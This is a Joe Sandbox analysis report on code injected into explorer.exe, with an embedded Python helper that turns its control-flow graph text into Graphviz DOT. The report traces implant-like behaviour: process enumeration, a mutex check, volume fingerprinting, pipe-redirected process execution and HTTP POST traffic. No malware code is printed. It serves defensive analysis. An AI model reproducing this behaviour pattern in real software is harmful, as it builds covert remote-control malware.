                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3963845541-0
                                                                                                                      • Opcode ID: 9dbb0ae3b12abb029211b0ba8255b4432c8abfcc7eb55f432a9f85dcaf06cc50
                                                                                                                      • Instruction ID: 823fea68318387afb3b0bc04b153563cc6861f855493437591032a2f161517c1
                                                                                                                      • Opcode Fuzzy Hash: 9dbb0ae3b12abb029211b0ba8255b4432c8abfcc7eb55f432a9f85dcaf06cc50
                                                                                                                      • Instruction Fuzzy Hash: 82E0EC72908A8182D7209B64E4083897B74F385778F944305EBF802AE8CF7CC289CB01

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 246 13aa5cc-13aa5f8 NtDelayExecution
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DelayExecution
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1249177460-0
                                                                                                                      • Opcode ID: 8d417d5b3bbdd0104a031ce28197241340a162a37eadbb870a06c08a322a4f93
                                                                                                                      • Instruction ID: 9b5820cd9715459cf060cfc4a1c409ede275838028893095ce93a43c36e22009
                                                                                                                      • Opcode Fuzzy Hash: 8d417d5b3bbdd0104a031ce28197241340a162a37eadbb870a06c08a322a4f93
                                                                                                                      • Instruction Fuzzy Hash: E6D0C77270868087DB145B14F44524A7760FB95304FD04519E6CD45B54DA3CC225CF04

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpRequest$OpenSend$InternetOption
                                                                                                                      • String ID: Content-Type: application/x-www-form-urlencoded
                                                                                                                      • API String ID: 664753792-457374458
                                                                                                                      • Opcode ID: bfe0fd7b3358009a2497291c1585463bdadc306482fc5a601edf221433aee303
                                                                                                                      • Instruction ID: 76fcc17943eddf8bdd7cf0c794a06a4a0b9ef7f2b950c9780acd7d82b5b8b56d
                                                                                                                      • Opcode Fuzzy Hash: bfe0fd7b3358009a2497291c1585463bdadc306482fc5a601edf221433aee303
                                                                                                                      • Instruction Fuzzy Hash: C761E372208B8486E760CB54F49439AB7A4F799788F904126EBCA43F68EF7DC148CB40

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 105 13a30b0-13a30d7 call 13a9674 call 13a5344 110 13a30d9-13a30de 105->110 111 13a30e3-13a30ea call 13a3074 105->111 112 13a323e-13a3245 110->112 115 13a30ec-13a30f1 111->115 116 13a30f6-13a3107 call 13a6e74 call 13a7134 111->116 115->112 121 13a311a-13a3122 call 13a7134 116->121 122 13a3109-13a310e 116->122 126 13a3124-13a3129 121->126 127 13a3135-13a3156 GetCurrentProcess IsWow64Process 121->127 122->121 123 13a3110-13a3115 122->123 123->112 126->127 128 13a312b-13a3130 126->128 129 13a3158-13a315d 127->129 130 13a3162-13a3169 call 13a5904 127->130 128->112 129->112 133 13a316b-13a3170 130->133 134 13a3175-13a3189 call 13a96d0 130->134 133->112 137 13a318b-13a3195 134->137 138 13a3197-13a319c 134->138 139 13a31a1-13a31bf CreateMutexW 137->139 138->139 140 13a31c1-13a31d3 GetLastError 139->140 141 13a31d5-13a31e2 139->141 140->141 142 13a31e4-13a31fb GetModuleHandleW call 13a3bd0 140->142 141->112 145 13a31fd-13a3202 142->145 146 13a3204-13a320b call 13a59a4 142->146 145->112 149 13a320d-13a3212 146->149 150 13a3214-13a321b call 13a5880 146->150 149->112 153 13a321d-13a3222 150->153 154 13a3224-13a3230 call 13aab3c call 13a52fc 150->154 153->112 158 13a3235-13a323a 154->158 158->112
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 323e24aefe1eb8265c58f2d108468d8cb0d1559239c2e860e07bd96b95da3856
                                                                                                                      • Instruction ID: a2af41deb9c0b18a5c58d1e661664faa1839c2cacfc88b700f3ff76f3e6dc75c
                                                                                                                      • Opcode Fuzzy Hash: 323e24aefe1eb8265c58f2d108468d8cb0d1559239c2e860e07bd96b95da3856
                                                                                                                      • Instruction Fuzzy Hash: 47312531209A8586EB30AB7DE84436976A4FF5637CFD00715E9EA86AE4DF38C508C716

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 420147892-0
                                                                                                                      • Opcode ID: cdc7aee9f013cd292d3a54cae21fe1e19c0375bd4ba8170c7a395ade045eb3ec
                                                                                                                      • Instruction ID: bcf7207581e3357de70201907a33724ba48ec5f9657bb991fb30e21c22b4d381
                                                                                                                      • Opcode Fuzzy Hash: cdc7aee9f013cd292d3a54cae21fe1e19c0375bd4ba8170c7a395ade045eb3ec
                                                                                                                      • Instruction Fuzzy Hash: BD01CD7261864087E770DB15E89875AB771FBC8758F841215E6CE86A68DF3CC645CB00

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 213 13a720c-13a7257 call 13a9674 * 2 FindFirstVolumeW 218 13a7259-13a725b 213->218 219 13a725d-13a72b4 GetVolumeInformationW FindVolumeClose 213->219 220 13a72c1-13a72c8 218->220 221 13a72bf 219->221 222 13a72b6-13a72bd 219->222 221->220 222->220
                                                                                                                      APIs
                                                                                                                      • FindFirstVolumeW.KERNEL32 ref: 013A7246
                                                                                                                      • GetVolumeInformationW.KERNEL32 ref: 013A729A
                                                                                                                      • FindVolumeClose.KERNEL32 ref: 013A72A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Volume$Find$CloseFirstInformation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 586543143-0
                                                                                                                      • Opcode ID: 768f91987acb0c695470ea88eccb12ca23a753f039ee139f7be31bd804ab313f
                                                                                                                      • Instruction ID: f374b1de3115e30bf83c24acba3033862cb27b750d7eb559b4c45fefee6f98a5
                                                                                                                      • Opcode Fuzzy Hash: 768f91987acb0c695470ea88eccb12ca23a753f039ee139f7be31bd804ab313f
                                                                                                                      • Instruction Fuzzy Hash: 8A110676218A4082D720DB54E48839AB7A5F7D5364FD00226E6EE82EA8DF7DC649CB00
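
The `control_flow_graph` lines in these entries are the text behind graph images that did not survive extraction, so the basic blocks, edges and API calls are all still here but hard to read. The Python below is an editor's example, not part of the Joe Sandbox report or its IDA plugin: it parses that text back into blocks and edges, lists the API orderings along each entry-to-exit path, and emits Graphviz DOT so the graph can be rendered again. The token grammar (node id, address span, `call <hex>` with an optional `* <n>` repeat, `a->b` edges, anything else an API name) is inferred from the lines on this page and is an assumption. The two embedded inputs are copied verbatim from the entry for the routine at 13a30b0 (CreateMutexW followed by GetLastError) and from the FindFirstVolumeW helper at 13a720c above.

```python
# Editor's example, not Joe Sandbox output. The token grammar is inferred from
# the `control_flow_graph` lines on this page (an assumption, not plugin docs).
import re
from collections import defaultdict
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")

@dataclass
class Block:
    nid: int                                    # node id as printed in the report
    start: int                                  # first address in the block
    end: int                                    # last address (== start for a one-address block)
    calls: list = field(default_factory=list)   # targets of `call <hex>` within the module
    apis: list = field(default_factory=list)    # imported APIs called from the block

def parse_cfg(text):
    """Parse one graph line into ({node id: Block}, [(src, dst), ...]).
    A decimal node id is followed by its span (`lo-hi` or one address); `call <hex>`
    may carry a `* <n>` repeat count; `a->b` is an edge; anything else is an API."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok == "call":
            target, count, i = int(tokens[i + 1], 16), 1, i + 2
            if i + 1 < len(tokens) and tokens[i] == "*":
                count, i = int(tokens[i + 1]), i + 2
            cur.calls.extend([target] * count)
        elif tok.isdigit():
            lo, _, hi = tokens[i + 1].partition("-")
            cur = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            nodes[cur.nid] = cur
            i += 2
        else:
            cur.apis.append(tok)
            i += 1
    return nodes, edges

def entry_block(nodes):
    """Function entry: the block with the lowest start address."""
    return min(nodes.values(), key=lambda b: b.start).nid

def exit_blocks(nodes, edges):
    """Blocks without successors, i.e. the function's return paths."""
    has_out = {s for s, _ in edges}
    return sorted(b for b in nodes if b not in has_out)

def api_sequences(nodes, edges, limit=10000):
    """API names along every simple entry-to-exit path. Paths that would close a
    loop (e.g. a FindNextFileW back edge) are dropped; the loop's exit path is kept."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    seqs = []

    def walk(nid, on_path, apis):
        if len(seqs) >= limit:
            return
        apis = apis + (nodes[nid].apis if nid in nodes else [])
        if not succ.get(nid):
            seqs.append(tuple(apis))
            return
        for nxt in succ[nid]:
            if nxt not in on_path:
                walk(nxt, on_path | {nid}, apis)

    walk(entry_block(nodes), frozenset(), [])
    return seqs

def to_dot(nodes, edges, name="cfg"):
    """Graphviz DOT so the graph can be rendered again with `dot -Tpng`."""
    lines = [f"digraph {name} {{", "  node [shape=box fontname=monospace];"]
    for b in sorted(nodes.values(), key=lambda b: b.start):
        label = "\\n".join([f"{b.nid}: {b.start:x}-{b.end:x}"]
                           + [f"call {t:x}" for t in b.calls] + b.apis)
        lines.append(f'  n{b.nid} [label="{label}"];')
    lines += [f"  n{s} -> n{d};" for s, d in edges] + ["}"]
    return "\n".join(lines)

# Sample input copied verbatim from two entries of this report (not constructed).
INIT_CFG = (
    "control_flow_graph 105 13a30b0-13a30d7 call 13a9674 call 13a5344 110 13a30d9-13a30de 105->110 "
    "111 13a30e3-13a30ea call 13a3074 105->111 112 13a323e-13a3245 110->112 115 13a30ec-13a30f1 111->115 "
    "116 13a30f6-13a3107 call 13a6e74 call 13a7134 111->116 115->112 121 13a311a-13a3122 call 13a7134 116->121 "
    "122 13a3109-13a310e 116->122 126 13a3124-13a3129 121->126 127 13a3135-13a3156 GetCurrentProcess "
    "IsWow64Process 121->127 122->121 123 13a3110-13a3115 122->123 123->112 126->127 128 13a312b-13a3130 126->128 "
    "129 13a3158-13a315d 127->129 130 13a3162-13a3169 call 13a5904 127->130 128->112 129->112 133 13a316b-13a3170 "
    "130->133 134 13a3175-13a3189 call 13a96d0 130->134 133->112 137 13a318b-13a3195 134->137 138 13a3197-13a319c "
    "134->138 139 13a31a1-13a31bf CreateMutexW 137->139 138->139 140 13a31c1-13a31d3 GetLastError 139->140 "
    "141 13a31d5-13a31e2 139->141 140->141 142 13a31e4-13a31fb GetModuleHandleW call 13a3bd0 140->142 141->112 "
    "145 13a31fd-13a3202 142->145 146 13a3204-13a320b call 13a59a4 142->146 145->112 149 13a320d-13a3212 146->149 "
    "150 13a3214-13a321b call 13a5880 146->150 149->112 153 13a321d-13a3222 150->153 154 13a3224-13a3230 "
    "call 13aab3c call 13a52fc 150->154 153->112 158 13a3235-13a323a 154->158 158->112")
VOLUME_CFG = (
    "control_flow_graph 213 13a720c-13a7257 call 13a9674 * 2 FindFirstVolumeW 218 13a7259-13a725b 213->218 "
    "219 13a725d-13a72b4 GetVolumeInformationW FindVolumeClose 213->219 220 13a72c1-13a72c8 218->220 "
    "221 13a72bf 219->221 222 13a72b6-13a72bd 219->222 221->220 222->220")

if __name__ == "__main__":
    nodes, edges = parse_cfg(INIT_CFG)
    print(len(nodes), "blocks,", len(edges), "edges; entry", entry_block(nodes),
          "exits", exit_blocks(nodes, edges))
    for seq in sorted(set(api_sequences(nodes, edges)), key=len):
        print(" -> ".join(seq) or "(no API calls on this path)")
    print(to_dot(nodes, edges))
```

Run as a script it prints the block and edge counts, the distinct API orderings (for the 13a30b0 routine the longest one is GetCurrentProcess, IsWow64Process, CreateMutexW, GetLastError, GetModuleHandleW), and the DOT, which `dot -Tpng` turns back into the missing picture. The same function works on any other `control_flow_graph` line on this page.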

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 239 13a52fc-13a5331 CreateThread 240 13a533a 239->240 241 13a5333-13a5338 239->241 242 13a533c-13a5340 240->242 241->242
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0

                                                                                                                      APIs
                                                                                                                      • CreatePipe.KERNEL32 ref: 013A10FF
                                                                                                                      • SetHandleInformation.KERNEL32 ref: 013A1119
                                                                                                                      • CreatePipe.KERNEL32 ref: 013A113A
                                                                                                                      • SetHandleInformation.KERNEL32 ref: 013A1154
                                                                                                                      • CreatePipe.KERNEL32 ref: 013A1175
                                                                                                                      • SetHandleInformation.KERNEL32 ref: 013A118F
                                                                                                                      • CreateProcessW.KERNEL32 ref: 013A1251
                                                                                                                        • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                      • PeekNamedPipe.KERNEL32 ref: 013A1300
                                                                                                                      • ReadFile.KERNEL32 ref: 013A135C
                                                                                                                      • PeekNamedPipe.KERNEL32 ref: 013A13B0
                                                                                                                      • ReadFile.KERNEL32 ref: 013A140C
                                                                                                                      • GetExitCodeProcess.KERNEL32 ref: 013A1445
                                                                                                                      • TerminateProcess.KERNEL32 ref: 013A1476
                                                                                                                      • CloseHandle.KERNEL32 ref: 013A1484
                                                                                                                        • Part of subcall function 013AA5CC: NtDelayExecution.NTDLL ref: 013AA5EE
                                                                                                                      • CloseHandle.KERNEL32 ref: 013A1492
                                                                                                                      • CloseHandle.KERNEL32 ref: 013A14A0
                                                                                                                      • CloseHandle.KERNEL32 ref: 013A14AE
                                                                                                                        • Part of subcall function 013A6814: NtFreeVirtualMemory.NTDLL ref: 013A6845
                                                                                                                      • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                      • String ID: h
                                                                                                                      • API String ID: 30365702-2439710439
                                                                                                                      • API ID: CloseFileInitOpenStringUnicode
                                                                                                                      • String ID: $0$@
                                                                                                                      • API String ID: 3719522541-2347541974
                                                                                                                      APIs
                                                                                                                      • RtlInitUnicodeString.NTDLL ref: 013A6567
                                                                                                                        • Part of subcall function 013A641C: GetFileAttributesW.KERNEL32 ref: 013A6430
                                                                                                                      • NtCreateFile.NTDLL ref: 013A65E6
                                                                                                                      • NtClose.NTDLL ref: 013A6604
                                                                                                                      • API ID: File$AttributesCloseCreateInitStringUnicode
                                                                                                                      • String ID: 0$@
                                                                                                                      • API String ID: 2504508917-1545510068
                                                                                                                      • API ID: CreateFileInitStringUnicode
                                                                                                                      • String ID: 0$@
                                                                                                                      • API String ID: 2498367268-1545510068
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                      • FindFirstFileA.KERNEL32 ref: 013A1AC7
                                                                                                                      • wsprintfA.USER32 ref: 013A1B95
                                                                                                                      • FindNextFileA.KERNEL32 ref: 013A1BC2
                                                                                                                      • FindClose.KERNEL32 ref: 013A1BD5
                                                                                                                      • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 65906682-0

                                                                                                                      Control-flow Graph (legend: Executed / Not Executed): basic blocks 13a1c38-13a2114, calling CreateToolhelp32Snapshot, Process32First, Process32Next, wsprintfA and CloseHandle, with subcalls to 13a958c, 13a96d0, 13a9f08, 13a2154, 13a21a8, 13a14d8 and 13a6814
                                                                                                                      • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3605396869-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                        • Part of subcall function 013A686C: SHGetFolderPathW.SHELL32 ref: 013A689F
                                                                                                                      • wsprintfW.USER32 ref: 013A37E1
                                                                                                                      • wsprintfW.USER32 ref: 013A383C
                                                                                                                      • wsprintfW.USER32 ref: 013A3957
                                                                                                                      • API ID: wsprintf$AllocateFolderMemoryPathVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 206084008-0
APIs
• wsprintfA.USER32 ref: 013A4C63
• wsprintfA.USER32 ref: 013A4D52
• wsprintfA.USER32 ref: 013A4E79
• new[].LIBCPMTD ref: 013A4F21
  • Part of subcall function 013A3DCC: InternetCloseHandle.WININET ref: 013A3FDF
  • Part of subcall function 013A3DCC: InternetCloseHandle.WININET ref: 013A3FF2
• new[].LIBCPMTD ref: 013A504F
• GetExitCodeThread.KERNEL32 ref: 013A526F
• GetExitCodeThread.KERNEL32 ref: 013A52A8
  • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
Memory Dump Source
• Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
Yara matches
Similarity
• API ID: wsprintf$CloseCodeExitHandleInternetThreadnew[]$AllocateMemoryVirtual
• String ID:
• API String ID: 511820185-0
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
Yara matches
Similarity
• API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
• String ID: @
• API String ID: 1610889594-2766056989
APIs
Memory Dump Source
• Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
Yara matches
Similarity
• API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
• String ID:
• API String ID: 4137211488-0
APIs
Memory Dump Source
• Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen
• String ID:
• API String ID: 435140893-0
APIs
Memory Dump Source
• Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandlewsprintf$CreateProcess
• String ID:
• API String ID: 2803068115-0